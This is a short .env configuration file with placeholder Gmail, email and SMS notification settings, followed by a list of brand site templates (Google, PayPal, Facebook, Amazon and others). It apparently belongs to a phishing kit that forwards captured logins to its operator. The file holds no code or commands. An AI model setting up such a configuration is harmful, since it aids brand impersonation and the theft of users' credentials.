GMAIL_APP_KEY=dslakfjsdlkfjd
GMAIL_EMAIL=joeshmoe@aol.com
SMS_PHONE_NUM=8585559987
SMS_CARRIER=txt.att.net
EMAIL_TO=joeshmoe@aol.com
# SITE=adobe
# SITE=amazon
# SITE=dropbox
# SITE=ebay
# SITE=facebook
# SITE=fbmobile
# SITE=github
SITE=google
# SITE=instagram
# SITE=linkedin
# SITE=messenger
# SITE=microsoft
# SITE=modal
# SITE=netflix
# SITE=paypal
# SITE=plugin-update
# SITE=snapchat
# SITE=spotify
# SITE=starbucks
# SITE=steam
# SITE=twitch
# SITE=twitter
# SITE=wordpress
# SITE=yahoo